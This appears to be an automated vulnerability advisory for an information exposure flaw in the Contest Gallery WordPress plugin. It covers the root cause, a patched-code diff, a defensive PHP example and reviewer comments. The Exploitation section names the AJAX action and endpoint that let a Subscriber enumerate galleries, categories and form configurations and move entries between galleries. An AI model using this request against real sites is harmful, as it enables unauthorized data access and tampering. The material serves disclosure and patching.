Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: May 18, 2026

CVE-2026-42660: Contest Gallery – Upload & Vote Photos, Media, Sell with PayPal & Stripe <= 28.1.7 – Authenticated (Subscriber+) Sensitive Information Exposure (contest-gallery)

Severity: Medium (CVSS 4.3)
CWE: CWE-200
Vulnerable Version: 28.1.7
Patched Version: 29.0.0
Disclosed: April 28, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-42660:

This vulnerability exposes sensitive user and configuration data in the Contest Gallery plugin for WordPress, affecting all versions up to and including 28.1.7. The issue stems from missing capability checks on AJAX handlers that process backend operations. Authenticated attackers with Subscriber-level access can extract data that should only be available to administrators, editors, or authors. The CVSS score is 4.3, indicating a moderate severity information disclosure.

Root Cause: The vulnerable code path resides in `ajax-functions-backend.php`. The function `post_cg_move_to_another_gallery_get_inputs` (the `+352,275` hunk in the diff below) and the function `post_cg_move_to_another_gallery` both lacked proper authorization checks before processing requests. In the vulnerable version, `post_cg_move_to_another_gallery_get_inputs` directly echoed gallery IDs, contact forms, and category data into an inline `<script>` tag without any permission validation. `post_cg_move_to_another_gallery` performed only a role check inside the AJAX handler and validated neither a nonce nor a gallery hash before processing the move operation. The patched version introduces `cg_backend_ajax_require_access_json()`, which checks user capabilities and validates a WordPress nonce, and `cg_backend_ajax_validate_gallery_hash_json()`, which validates a gallery-specific hash before allowing the operation.

Exploitation: An attacker authenticated as a Subscriber can trigger the `post_cg_move_to_another_gallery_get_inputs` AJAX action by sending a POST request to `/wp-admin/admin-ajax.php` with `action=post_cg_move_to_another_gallery_get_inputs`. This returns a JSON object containing `allCategoriesByGalleryID`, `galleryIDs`, and `contact_forms_by_gallery_id`, which reveal the full list of gallery IDs, their associated categories, and form input configurations. Alternatively, the attacker could call `post_cg_move_to_another_gallery` with crafted parameters to move gallery entries between galleries, using the previously leaked gallery IDs.

Patch Analysis: The patch introduces two new security functions. `cg_backend_ajax_require_access_json()` checks that the request is a valid AJAX request, that the user is logged in with backend access, and that a valid nonce (`cg_nonce`) is present. `cg_backend_ajax_validate_gallery_hash_json()` computes an MD5 hash of `wp_salt('auth')` combined with the gallery ID and compares it to the provided `cgGalleryHash` parameter. Both `post_cg_move_to_another_gallery_get_inputs` and `post_cg_move_to_another_gallery` now call `cg_backend_ajax_require_access_json()` at the start, and the move function additionally validates the gallery hash. `post_cg_move_to_another_gallery_get_inputs` now returns its data via `wp_send_json_success()` instead of echoing it into a `<script>` tag, so the handler produces a proper JSON response.
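The Root Cause and Patch Analysis sections above describe three controls: a capability check, a nonce check, and a per-gallery token, followed by a JSON response instead of an inline script. The block below is an added example written for this page, not the Contest Gallery plugin's code, showing the same pattern for a minimal WordPress AJAX handler built only on WordPress core APIs. Everything prefixed `myplugin_` (function names, the `myplugin_categories` table, the `myplugin-admin` script handle) is hypothetical, and the choice of `publish_posts` as the capability that administrators, editors and authors hold but subscribers and contributors lack is an assumption made here. It also goes one step beyond the patch: the per-gallery token is an HMAC keyed with `wp_salt('auth')` and compared with `hash_equals()`, and the response is scoped to the gallery the token was issued for.

```php
<?php
// Added example for this page (not the plugin's code). Names prefixed
// "myplugin_" are hypothetical. Assumption: the "publish_posts" capability
// stands in for "administrator, editor or author".
defined('ABSPATH') || exit;

// 1. Authorization plus CSRF protection for a logged-in backend AJAX request.
//    wp_send_json_error() ends the request, so a failed check never falls through.
function myplugin_require_backend_ajax_access() {
    if (!wp_doing_ajax()) {
        wp_send_json_error(array('code' => 'invalid_ajax_request'), 400);
    }
    // Capability check. The vulnerable handler had none, which is what let a
    // Subscriber read gallery, category and form data.
    if (!is_user_logged_in() || !current_user_can('publish_posts')) {
        wp_send_json_error(array('code' => 'missing_rights'), 403);
    }
    // Nonce check. Passing false as the third argument makes check_ajax_referer()
    // return instead of die(), so the error can be reported as JSON too.
    if (!check_ajax_referer('myplugin_backend', 'nonce', false)) {
        wp_send_json_error(array('code' => 'nonce_invalid'), 403);
    }
}

// 2. Per-object token. The patch uses md5(wp_salt('auth') . id) and a plain
//    string compare; here the salt is used as an HMAC key and the comparison
//    is constant-time.
function myplugin_gallery_token($gallery_id) {
    return hash_hmac('sha256', 'gallery:' . absint($gallery_id), wp_salt('auth'));
}

function myplugin_require_valid_gallery_token($gallery_id, $token) {
    $gallery_id = absint($gallery_id);
    if ($gallery_id === 0 || !is_string($token) || $token === '') {
        wp_send_json_error(array('code' => 'missing_gallery_token'), 403);
    }
    if (!hash_equals(myplugin_gallery_token($gallery_id), $token)) {
        wp_send_json_error(array('code' => 'invalid_gallery_token'), 403);
    }
}

// 3. The handler: checks first, then the query, then a JSON response rather
//    than an inline <script> block. Only the wp_ajax_ (logged-in) hook is
//    registered; there is deliberately no wp_ajax_nopriv_ variant.
add_action('wp_ajax_myplugin_gallery_inputs', 'myplugin_gallery_inputs');
function myplugin_gallery_inputs() {
    myplugin_require_backend_ajax_access();

    $gallery_id = isset($_POST['gallery_id']) ? absint($_POST['gallery_id']) : 0;
    $token      = isset($_POST['gallery_token'])
        ? sanitize_text_field(wp_unslash($_POST['gallery_token']))
        : '';
    myplugin_require_valid_gallery_token($gallery_id, $token);

    global $wpdb;
    // Hypothetical table; the query is parameterised with $wpdb->prepare().
    $table = $wpdb->prefix . 'myplugin_categories';
    $rows  = $wpdb->get_results($wpdb->prepare(
        "SELECT id, Name FROM {$table} WHERE GalleryID = %d ORDER BY id DESC",
        $gallery_id
    ));

    // Scope the response to the gallery the token was issued for instead of
    // returning every gallery's data.
    wp_send_json_success(array(
        'galleryID'  => $gallery_id,
        'categories' => $rows,
    ));
}

// The nonce (and, per gallery, the token) reach the admin JavaScript through
// wp_localize_script(); nothing has to be echoed from the AJAX handler itself.
// Assumption: 'myplugin-admin' is the handle of an already registered script.
add_action('admin_enqueue_scripts', function () {
    wp_localize_script('myplugin-admin', 'myplugin_vars', array(
        'ajax_url' => admin_url('admin-ajax.php'),
        'nonce'    => wp_create_nonce('myplugin_backend'),
    ));
});
```

The order of the checks matters: the request is rejected for missing rights or a bad nonce before any request parameter is interpreted, and the gallery token is validated before the database is touched, so an unauthorized caller learns nothing beyond the error code.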

Impact: Successful exploitation allows a Subscriber-level attacker to enumerate all gallery IDs, their category structures, and contact form configurations. This information can be used to map out the site’s gallery architecture, potentially revealing private or unpublished galleries. Additionally, the attacker could move entries between galleries, causing data corruption or unauthorized modifications. The exposed configuration data could also aid in further attacks against the site or its users.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/contest-gallery/ajax/ajax-functions-backend.php
+++ b/contest-gallery/ajax/ajax-functions-backend.php
@@ -1,10 +1,60 @@
 <?php
+if (!function_exists('cg_backend_ajax_error_json')) {
+    function cg_backend_ajax_error_json($message, $status = 400, $code = 'cg_backend_ajax_error') {
+        wp_send_json_error(array(
+            'message' => $message,
+            'code' => $code
+        ), $status);
+    }
+}
+
+if (!function_exists('cg_backend_ajax_require_access_json')) {
+    function cg_backend_ajax_require_access_json() {
+        if (!defined('DOING_AJAX') || !DOING_AJAX) {
+            cg_backend_ajax_error_json('Invalid AJAX request.', 400, 'cg_invalid_ajax_request');
+        }
+
+        if (!is_user_logged_in() || !cg_user_has_backend_access()) {
+            cg_backend_ajax_error_json('This area can be edited only as administrator, editor or author.', 403, 'cg_missing_rights');
+        }
+
+        $cg_nonce = '';
+        if (isset($_POST['cg_nonce'])) {
+            $cg_nonce = sanitize_text_field($_POST['cg_nonce']);
+        } elseif (isset($_GET['cg_nonce'])) {
+            $cg_nonce = sanitize_text_field($_GET['cg_nonce']);
+        }
+
+        if (empty($cg_nonce) || !wp_verify_nonce($cg_nonce, 'cg_nonce')) {
+            wp_send_json_error(array(
+                'message' => 'WP nonce security token not set or not valid anymore.',
+                'code' => 'cg_nonce_invalid',
+                'version' => cg_get_version()
+            ), 403);
+        }
+    }
+}
+
+if (!function_exists('cg_backend_ajax_validate_gallery_hash_json')) {
+    function cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash) {
+        $GalleryID = absint($GalleryID);
+        if (empty($GalleryID) || empty($galleryHash)) {
+            cg_backend_ajax_error_json('Missing gallery validation data.', 403, 'cg_missing_gallery_hash');
+        }
+
+        $galleryHashToCompare = md5(wp_salt('auth') . '---cngl1---' . $GalleryID);
+        if ($galleryHash !== $galleryHashToCompare) {
+            cg_backend_ajax_error_json('Invalid gallery validation data.', 403, 'cg_invalid_gallery_hash');
+        }
+    }
+}
+
 // post_cg_get_current_permalinks
 add_action('wp_ajax_post_cg_get_current_permalinks', 'post_cg_get_current_permalinks');
 if (!function_exists('post_cg_get_current_permalinks')) {
     function post_cg_get_current_permalinks() {

-        cg_check_nonce();
+        cg_require_backend_access();

         global $wpdb;
         $tablename = $wpdb->prefix . "contest_gal1ery";
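Review bot: In `cg_backend_ajax_validate_gallery_hash_json` the comparison `$galleryHash !== $galleryHashToCompare` is a plain string compare; use `hash_equals($galleryHashToCompare, $galleryHash)` so the check runs in constant time, and consider `hash_hmac('sha256', ..., wp_salt('auth'))` in place of `md5(wp_salt('auth') . '---cngl1---' . $GalleryID)` so the salt acts as a key rather than a concatenated prefix. Separately, `cg_user_has_backend_access()` and the `cg_require_backend_access()` that replaces `cg_check_nonce()` in `post_cg_get_current_permalinks` are not part of this hunk; the 403 message promises administrator, editor or author, so confirm those helpers enforce exactly that set and that `cg_require_backend_access()` still verifies the nonce the removed call did.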
@@ -54,10 +104,8 @@

 // create PDF preview
 add_action('wp_ajax_post_cg_create_pdf_preview_backend', 'post_cg_create_pdf_preview_backend');
-if (!function_exists('post_cg_create_pdf_preview_backend')) {
-    function post_cg_create_pdf_preview_backend($WpUpload = 0, $realId = 0, $cg_base_64 = '', $isFromFrontendUpload = false) {
-
-        cg_check_nonce();
+if (!function_exists('cg_create_pdf_preview_internal')) {
+    function cg_create_pdf_preview_internal($WpUpload = 0, $realId = 0, $cg_base_64 = '', $isFromFrontendUpload = false) {

         global $wpdb;
         $tablename_posts = $wpdb->prefix . "posts";
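Review bot: `cg_create_pdf_preview_internal` drops the `cg_check_nonce()` call that `post_cg_create_pdf_preview_backend` used to make, yet it still falls back to reading `$_POST` when its arguments are empty. Add a docblock stating that this function performs no authorization and must only be reached through a wrapper that does; the `add_action` line still registers `post_cg_create_pdf_preview_backend`, so that wrapper must exist and call `cg_require_backend_access()` before delegating here.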
@@ -67,138 +115,149 @@

         $_POST = cg1l_sanitize_post($_POST);

-        //var_dump(33444);
-        //var_dump($_POST);
+        $result = [
+            'ok' => false,
+            'attach_id' => 0,
+            'preview_url' => '',
+            'error' => ''
+        ];

-        // create image attachment
         $wp_upload_dir = wp_upload_dir();
-        $currentUploadDir = $wp_upload_dir['basedir'];
-        $cgWpUploadToReplace = '';
-        $cgNewWpUploadWhichReplace = '';
-        if(empty($WpUpload)){
-            $WpUpload = absint($_POST['cg_wp_upload']);
+        $cgWpUploadToReplace = 0;
+        $cgNewWpUploadWhichReplace = 0;
+        if (empty($WpUpload)) {
+            $WpUpload = (!empty($_POST['cg_wp_upload'])) ? absint($_POST['cg_wp_upload']) : 0;
         }
-        if(empty($realId)){
-            $realId = absint($_POST['cgRealId']);
+        if (empty($realId)) {
+            $realId = (!empty($_POST['cgRealId'])) ? absint($_POST['cgRealId']) : 0;
         }
-        if(empty($cg_base_64)){
+        if (empty($cg_base_64)) {
             $cg_base_64 = (!empty($_POST['cg_base_64'])) ? $_POST['cg_base_64'] : '';
         }
-        if(!empty($_POST['cgWpUploadToReplace'])){
+        if (!empty($_POST['cgWpUploadToReplace'])) {
             $cgWpUploadToReplace = absint($_POST['cgWpUploadToReplace']);
         }
-        if(!empty($_POST['cgNewWpUploadWhichReplace'])){
+        if (!empty($_POST['cgNewWpUploadWhichReplace'])) {
             $cgNewWpUploadWhichReplace = absint($_POST['cgNewWpUploadWhichReplace']);
         }

-        $realIdRow = $wpdb->get_row( "SELECT * FROM $tablename WHERE id='$realId'" );
-        $WpUploadRow = $wpdb->get_row( "SELECT * FROM $tablename_posts WHERE ID='$WpUpload'" );
+        if (empty($WpUpload) || empty($realId)) {
+            $result['error'] = 'missing_parameters';
+            return $result;
+        }
+
+        $realIdRow = $wpdb->get_row("SELECT * FROM $tablename WHERE id='$realId'");
+        if (empty($realIdRow)) {
+            $result['error'] = 'missing_real_id_row';
+            return $result;
+        }

-        //var_dump('$cgWpUploadToReplace456');
-        //var_dump($cgWpUploadToReplace);
-        //var_dump('$cgNewWpUploadWhichReplace456');
-        //var_dump($cgNewWpUploadWhichReplace);
+        $WpUploadRow = $wpdb->get_row("SELECT * FROM $tablename_posts WHERE ID='$WpUpload'");
+        if (empty($WpUploadRow)) {
+            $result['error'] = 'missing_wp_upload_row';
+            return $result;
+        }

-        if(!empty($cgWpUploadToReplace) && !empty($cgNewWpUploadWhichReplace)  && !empty($realIdRow->EcommerceEntry)){
+        if (!empty($cgWpUploadToReplace) && !empty($cgNewWpUploadWhichReplace) && !empty($realIdRow->EcommerceEntry)) {
             $EcommerceEntry = $realIdRow->EcommerceEntry;
-            $ecommerceEntry = $wpdb->get_row( "SELECT * FROM $tablename_ecommerce_entries WHERE id='$EcommerceEntry'" );
+            $ecommerceEntry = $wpdb->get_row("SELECT * FROM $tablename_ecommerce_entries WHERE id='$EcommerceEntry'");
             $removedWpUploadIdsFromSale = [$cgWpUploadToReplace];
-            //var_dump('cg_replace_ecommerce_file');
-            cg_replace_ecommerce_file($realIdRow->id, $realIdRow->GalleryID, $ecommerceEntry, $cgNewWpUploadWhichReplace, [],$removedWpUploadIdsFromSale);
+            cg_replace_ecommerce_file($realIdRow->id, $realIdRow->GalleryID, $ecommerceEntry, $cgNewWpUploadWhichReplace, [], $removedWpUploadIdsFromSale);
         }

-        // check multiple files
         $multipleFilesPdfPreview = 0;
         $multipleFilesTitle = '';
-        if(!empty($realIdRow->MultipleFiles) && $realIdRow->MultipleFiles!='""'){
+        if (!empty($realIdRow->MultipleFiles) && $realIdRow->MultipleFiles != '""') {
             $MultipleFiles = unserialize($realIdRow->MultipleFiles);
-            foreach($MultipleFiles as $file){
-                if(empty($file['isRealIdSource']) && $file['post_mime_type']=='application/pdf' && $file['WpUpload'] == $WpUpload && !empty($file['PdfPreview'])){
-                    // post_title
-                    $multipleFilesPdfPreview = $file['PdfPreview'];// set for multiple files then
+            foreach ($MultipleFiles as $file) {
+                if (empty($file['isRealIdSource']) && $file['post_mime_type'] == 'application/pdf' && $file['WpUpload'] == $WpUpload && !empty($file['PdfPreview'])) {
+                    $multipleFilesPdfPreview = $file['PdfPreview'];
                     $multipleFilesTitle = $file['post_title'];
                 }
             }
         }

-        //var_dump($realIdRow->PdfPreview);
-        //var_dump(get_post( $realIdRow->PdfPreview ));
-        if(!empty($realIdRow->PdfPreview) && !empty(get_post( $realIdRow->PdfPreview )) && $WpUpload == $realIdRow->WpUpload){
-            if(!$isFromFrontendUpload){
-                $PdfPreviewImage = wp_get_attachment_image_src($realIdRow->PdfPreview, 'large');
-                echo 'cg_guid###'.$PdfPreviewImage[0].'###cg_guid_end';
-            }
-        }elseif(!empty($multipleFilesPdfPreview) && !empty(get_post($multipleFilesPdfPreview))){// set for multiple files then
-            if(!$isFromFrontendUpload){
-                $multipleFilesPdfPreviewImage = wp_get_attachment_image_src($multipleFilesPdfPreview, 'large');
-                echo 'cg_guid###'.$multipleFilesPdfPreviewImage[0].'###cg_guid_end';
-            }
-        }else{
-            //var_dump(222);
+        if (!empty($realIdRow->PdfPreview) && !empty(get_post($realIdRow->PdfPreview)) && $WpUpload == $realIdRow->WpUpload) {
+            $PdfPreviewImage = wp_get_attachment_image_src($realIdRow->PdfPreview, 'large');
+            $result['ok'] = true;
+            $result['attach_id'] = absint($realIdRow->PdfPreview);
+            $result['preview_url'] = (!empty($PdfPreviewImage[0])) ? $PdfPreviewImage[0] : '';
+            return $result;
+        } elseif (!empty($multipleFilesPdfPreview) && !empty(get_post($multipleFilesPdfPreview))) {
+            $multipleFilesPdfPreviewImage = wp_get_attachment_image_src($multipleFilesPdfPreview, 'large');
+            $result['ok'] = true;
+            $result['attach_id'] = absint($multipleFilesPdfPreview);
+            $result['preview_url'] = (!empty($multipleFilesPdfPreviewImage[0])) ? $multipleFilesPdfPreviewImage[0] : '';
+            return $result;
+        } else {
             $content = base64_decode(preg_replace('#^data:image/w+;base64,#i', '', $cg_base_64));
+            if (empty($content)) {
+                $result['error'] = 'missing_preview_payload';
+                return $result;
+            }
+
             $formImage = imagecreatefromstring($content);
+            if (!$formImage) {
+                $result['error'] = 'invalid_preview_payload';
+                return $result;
+            }

-            if(!empty($multipleFilesPdfPreview)){
-                $fullName = $multipleFilesTitle.'-cg-pdf-preview';
-            }else{
-                $fullName = $WpUploadRow->post_title.'-cg-pdf-preview';
+            if (!empty($multipleFilesPdfPreview)) {
+                $fullName = $multipleFilesTitle . '-cg-pdf-preview';
+            } else {
+                $fullName = $WpUploadRow->post_title . '-cg-pdf-preview';
             }
             $fullNamePath = $fullName;
             $fullNamePath = cg_pre_process_name_for_url_name($fullNamePath);
             $fullNamePath = cg_check_first_char_for_url_name_after_pre_processing($fullNamePath);
             $fullNamePath = cg_check_last_char_for_url_name_after_pre_processing($fullNamePath);
-            $fullNamePath = cg_sluggify_for_url($fullNamePath);// has to be tested with asia chars one time
+            $fullNamePath = cg_sluggify_for_url($fullNamePath);
             $fullNamePathFirst = $fullNamePath;

-            //var_dump('$fullName');
-            //var_dump($fullName);
-
-            $fullPath = $wp_upload_dir['basedir'].$wp_upload_dir['subdir'].'/'.$fullNamePathFirst.'.png';
-            //var_dump('$fullPath check');
-            //var_dump($fullPath);
-            if(file_exists($fullPath)){
-                //var_dump(112233);
+            $fullPath = $wp_upload_dir['basedir'] . $wp_upload_dir['subdir'] . '/' . $fullNamePathFirst . '.png';
+            if (file_exists($fullPath)) {
                 $i = 0;
-                do{
-                    if($i==0){
+                do {
+                    if ($i == 0) {
                         $i = 1;
-                    }else{
+                    } else {
                         $i++;
                     }
-                    $add = '-'.$i;
-                    $fullNamePath = $fullNamePathFirst.$add;
-                    $fullPath = $wp_upload_dir['basedir'].$wp_upload_dir['subdir'].'/'.$fullNamePath.'.png';
-                }while(file_exists($fullPath));
+                    $add = '-' . $i;
+                    $fullNamePath = $fullNamePathFirst . $add;
+                    $fullPath = $wp_upload_dir['basedir'] . $wp_upload_dir['subdir'] . '/' . $fullNamePath . '.png';
+                } while (file_exists($fullPath));
             }

-            //var_dump('$fullPath');
-            //var_dump($fullPath);
-
-            //var_dump('$fullName');
-            //var_dump($fullName);
-
-            // for png
-            imagesavealpha($formImage,true);// required for png images... otherwise background black
-
-            //imagejpeg($formImage,$WpUploadFilesPostBaseUrls[$base64WatermarkedAndAltFilesWpUploadId]);
-            //imagegif($formImage,$WpUploadFilesPostBaseUrls[$base64WatermarkedAndAltFilesWpUploadId]);
-            imagepng($formImage,$fullPath);
-
-            //file_put_contents($fullNewPath,$content);
+            imagesavealpha($formImage, true);
+            imagepng($formImage, $fullPath);
+
+            if (!file_exists($fullPath)) {
+                imagedestroy($formImage);
+                $result['error'] = 'preview_file_not_created';
+                return $result;
+            }

             $attachment = array(
-                'guid' => $wp_upload_dir['url']."/".$fullNamePath.'.png',
+                'guid' => $wp_upload_dir['url'] . "/" . $fullNamePath . '.png',
                 'post_mime_type' => 'image/png',
                 'post_title' => $fullName,
                 'post_content' => '',
                 'post_status' => 'inherit'
             );

-            $attach_id = wp_insert_attachment( $attachment, $fullPath );
-            $imagenew = get_post( $attach_id );
-            $fullsizepath = get_attached_file( $imagenew->ID );
-            $attach_data = wp_generate_attachment_metadata( $attach_id, $fullsizepath );
-            wp_update_attachment_metadata( $attach_id, $attach_data );
+            $attach_id = wp_insert_attachment($attachment, $fullPath);
+            if (empty($attach_id) || is_wp_error($attach_id)) {
+                imagedestroy($formImage);
+                $result['error'] = 'preview_attachment_insert_failed';
+                return $result;
+            }
+
+            $imagenew = get_post($attach_id);
+            $fullsizepath = get_attached_file($imagenew->ID);
+            $attach_data = wp_generate_attachment_metadata($attach_id, $fullsizepath);
+            wp_update_attachment_metadata($attach_id, $attach_data);
+            imagedestroy($formImage);

             $wpdb->query($wpdb->prepare(
                 "
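Review bot: The new empty-row checks after `$wpdb->get_row("SELECT * FROM $tablename WHERE id='$realId'")` and `... WHERE ID='$WpUpload'` are welcome, but both queries still interpolate the value into the SQL string. `$realId` and `$WpUpload` are `absint()`-cast so this is not exploitable here, and the same hunk already uses `$wpdb->prepare()` for the INSERT, so rewrite these as `$wpdb->prepare("SELECT * FROM $tablename WHERE id = %d", $realId)` for consistency. Also, the pattern in `preg_replace('#^data:image/w+;base64,#i', '', $cg_base_64)` reads `w+` rather than `\w+` as shown; confirm the source has the escaped form, otherwise a `data:image/png;base64,` prefix is never stripped and `base64_decode` receives the whole string.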
@@ -206,37 +265,30 @@
 						(id, WpUpload, WpUploadPreview)
 						VALUES ( %s,%d,%d)
 					",
-                '',$WpUpload,$attach_id
+                '', $WpUpload, $attach_id
             ));

             $multipleFilesWpUploadForPdfPreview = 0;

-            if(!empty($realIdRow->MultipleFiles) && $realIdRow->MultipleFiles!='""'){
+            if (!empty($realIdRow->MultipleFiles) && $realIdRow->MultipleFiles != '""') {
                 $MultipleFiles = unserialize($realIdRow->MultipleFiles);
-                foreach($MultipleFiles as $file){
-                    if(empty($file['isRealIdSource']) && $file['post_mime_type']=='application/pdf' && $file['WpUpload'] == $WpUpload){
+                foreach ($MultipleFiles as $file) {
+                    if (empty($file['isRealIdSource']) && $file['post_mime_type'] == 'application/pdf' && $file['WpUpload'] == $WpUpload) {
                         $multipleFilesWpUploadForPdfPreview = $WpUpload;
                     }
                 }
             }

-            //var_dump('$multipleFilesWpUploadForPdfPreview');
-            //var_dump($multipleFilesWpUploadForPdfPreview);
-
-            if(!empty($multipleFilesWpUploadForPdfPreview)){
-                //var_dump('$multipleFilesPdfPreview');
-                //var_dump($multipleFilesPdfPreview);
+            if (!empty($multipleFilesWpUploadForPdfPreview)) {
                 $MultipleFiles = unserialize($realIdRow->MultipleFiles);
                 $MultipleFilesNew = [];
-                foreach($MultipleFiles as $order => $file){
-                    if(empty($file['isRealIdSource']) && $file['post_mime_type']=='application/pdf' && $file['WpUpload'] == $WpUpload && $multipleFilesWpUploadForPdfPreview == $WpUpload){
-                        //var_dump('set PdfPreview');
+                foreach ($MultipleFiles as $order => $file) {
+                    if (empty($file['isRealIdSource']) && $file['post_mime_type'] == 'application/pdf' && $file['WpUpload'] == $WpUpload && $multipleFilesWpUploadForPdfPreview == $WpUpload) {
                         $file['PdfPreview'] = $attach_id;
                         $PdfPreviewImage = wp_get_attachment_image_src($attach_id, 'full');
                         $file['PdfPreviewImage'] = $PdfPreviewImage[0];
                         $PdfPreviewImageLarge = wp_get_attachment_image_src($attach_id, 'large');
                         $file['PdfPreviewImageLarge'] = $PdfPreviewImageLarge[0];
-                        // important to set PdfOriginal
                         $file['PdfOriginal'] = get_the_guid($file['WpUpload']);
                         $file['full'] = $PdfPreviewImage[0];
                         $file['guid'] = $PdfPreviewImage[0];
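Review bot: `unserialize($realIdRow->MultipleFiles)` is called here on a column the plugin writes back from request-derived data (and is called again in the next hunk); pass `array('allowed_classes' => false)` as the second argument so a crafted serialized string cannot instantiate objects, and reuse the `$MultipleFiles` array already decoded in the earlier `$multipleFilesPdfPreview` loop rather than decoding the same column three times in one function.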
@@ -251,42 +303,46 @@
                     }
                     $MultipleFilesNew[$order] = $file;
                 }
-                /*echo "<pre>";
-                    print_r($MultipleFilesNew);
-                echo "</pre>";*/
                 $MultipleFilesNew = serialize($MultipleFilesNew);
-                //var_dump('$realId set MultipleFiles');
-                //var_dump($realId);
-                // SET MultipleFiles='$MultipleFilesNew' ... serialized $MultipleFilesNew has to be in ''
                 $wpdb->query("UPDATE $tablename SET MultipleFiles='$MultipleFilesNew' WHERE id = $realId");
-            }else{
-                //var_dump('$realId set PdfPreview');
+            } else {
                 $wpdb->query("UPDATE $tablename SET PdfPreview=$attach_id WHERE id = $realId");
             }

-            if(!$isFromFrontendUpload){
-                if(!empty($realIdRow->Active)){
-                    $uploadFolder = wp_upload_dir();
-                    $thumbSizesWp = array();
-                    $thumbSizesWp['thumbnail_size_w'] = get_option("thumbnail_size_w");
-                    $thumbSizesWp['medium_size_w'] = get_option("medium_size_w");
-                    $thumbSizesWp['large_size_w'] = get_option("large_size_w");
-                    $imageArray = array();
-                    $pid = $realIdRow->id;
-                    $GalleryID = $realIdRow->GalleryID;
-                    $row = $wpdb->get_row( "SELECT DISTINCT $tablename_posts.*, $tablename.* FROM $tablename_posts, $tablename WHERE
-                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' and $tablename_posts.ID = $tablename.WpUpload)
-                          OR
-                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' AND $tablename.WpUpload = 0)
+            if (!$isFromFrontendUpload && !empty($realIdRow->Active)) {
+                $uploadFolder = wp_upload_dir();
+                $thumbSizesWp = array();
+                $thumbSizesWp['thumbnail_size_w'] = get_option("thumbnail_size_w");
+                $thumbSizesWp['medium_size_w'] = get_option("medium_size_w");
+                $thumbSizesWp['large_size_w'] = get_option("large_size_w");
+                $imageArray = array();
+                $pid = $realIdRow->id;
+                $GalleryID = $realIdRow->GalleryID;
+                $row = $wpdb->get_row("SELECT DISTINCT $tablename_posts.*, $tablename.* FROM $tablename_posts, $tablename WHERE
+                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' and $tablename_posts.ID = $tablename.WpUpload)
+                          OR
+                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' AND $tablename.WpUpload = 0)
                           GROUP BY $tablename.id  ORDER BY $tablename.id DESC LIMIT 0, 1");
-                    cg_create_json_files_when_activating($GalleryID,$row,$thumbSizesWp,$uploadFolder,$imageArray);
-                }
+                cg_create_json_files_when_activating($GalleryID, $row, $thumbSizesWp, $uploadFolder, $imageArray);
+            }

-                $PdfPreviewImage = wp_get_attachment_image_src($attach_id, 'large');
-                $PdfPreviewImage = $PdfPreviewImage[0];
+            $PdfPreviewImage = wp_get_attachment_image_src($attach_id, 'large');

-                echo 'cg_guid###'.$PdfPreviewImage.'###cg_guid_end';
-            }
+            $result['ok'] = true;
+            $result['attach_id'] = absint($attach_id);
+            $result['preview_url'] = (!empty($PdfPreviewImage[0])) ? $PdfPreviewImage[0] : '';
+            return $result;
+        }
+    }
+}
+if (!function_exists('post_cg_create_pdf_preview_backend')) {
+    function post_cg_create_pdf_preview_backend($WpUpload = 0, $realId = 0, $cg_base_64 = '', $isFromFrontendUpload = false) {
+        cg_require_backend_access();
+        $result = cg_create_pdf_preview_internal($WpUpload, $realId, $cg_base_64, $isFromFrontendUpload);
+        if (!empty($result['ok']) && !$isFromFrontendUpload && !empty($result['preview_url'])) {
+            echo 'cg_guid###' . $result['preview_url'] . '###cg_guid_end';
+        } elseif (empty($result['ok'])) {
+            echo 'cg_error###' . $result['error'] . '###cg_error_end';
         }
     }
 }
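Review bot: `$wpdb->query("UPDATE $tablename SET MultipleFiles='$MultipleFilesNew' WHERE id = $realId")` is left unchanged: `$MultipleFilesNew` is a serialized array containing `post_title`-derived strings and is placed inside single quotes with no escaping, so any quote in a title breaks the statement. Use `$wpdb->prepare("UPDATE $tablename SET MultipleFiles = %s WHERE id = %d", $MultipleFilesNew, $realId)` here and `%d` for `$attach_id` in the `else` branch. The new `post_cg_create_pdf_preview_backend` wrapper correctly gates on `cg_require_backend_access()` before calling the internal function; note that the `cg_error###...###cg_error_end` marker it echoes is a new output format the admin JavaScript must be updated to parse.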
@@ -296,212 +352,275 @@
 if (!function_exists('post_cg_move_to_another_gallery_get_inputs')) {
 	function post_cg_move_to_another_gallery_get_inputs() {

-    global $wpdb;
-    $tablename_form_input = $wpdb->prefix . "contest_gal1ery_f_input";
-    $tablenameOptions = $wpdb->prefix . "contest_gal1ery_options";
-    $tablename_categories = $wpdb->prefix . "contest_gal1ery_categories";
+        cg_backend_ajax_require_access_json();
+        $_POST = cg1l_sanitize_post($_POST);

-    $contact_forms = $wpdb->get_results("SELECT * FROM $tablename_form_input WHERE id > 0");
+        $MoveFromGalleryID = (!empty($_POST['cgMoveFromGalleryID'])) ? absint($_POST['cgMoveFromGalleryID']) : 0;
+        $galleryHash = (!empty($_POST['cgGalleryHash'])) ? $_POST['cgGalleryHash'] : '';
+        cg_backend_ajax_validate_gallery_hash_json($MoveFromGalleryID, $galleryHash);

-    $contact_forms_by_gallery_id = [];
-    foreach ($contact_forms as $form){
-        if(!isset($contact_forms_by_gallery_id[$form->GalleryID])){
-	        $contact_forms_by_gallery_id[$form->GalleryID] = [];
-        }
-	    if(is_serialized($form->Field_Content)){
-		    $form->Field_Content = unserialize($form->Field_Content);
+        global $wpdb;
+        $tablename_form_input = $wpdb->prefix . "contest_gal1ery_f_input";
+        $tablenameOptions = $wpdb->prefix . "contest_gal1ery_options";
+        $tablename_categories = $wpdb->prefix . "contest_gal1ery_categories";
+
+        $contact_forms = $wpdb->get_results("SELECT * FROM $tablename_form_input WHERE id > 0");
+
+        $contact_forms_by_gallery_id = [];
+        foreach ($contact_forms as $form){
+            if(!isset($contact_forms_by_gallery_id[$form->GalleryID])){
+                $contact_forms_by_gallery_id[$form->GalleryID] = [];
+            }
+            if(is_serialized($form->Field_Content)){
+                $form->Field_Content = unserialize($form->Field_Content);
+            }
+            $contact_forms_by_gallery_id[$form->GalleryID][] = $form;
         }
-	    $contact_forms_by_gallery_id[$form->GalleryID][] = $form;
-    }

-		$galleryIDs = $wpdb->get_results("SELECT id FROM $tablenameOptions WHERE id >= 1 ORDER BY id DESC");
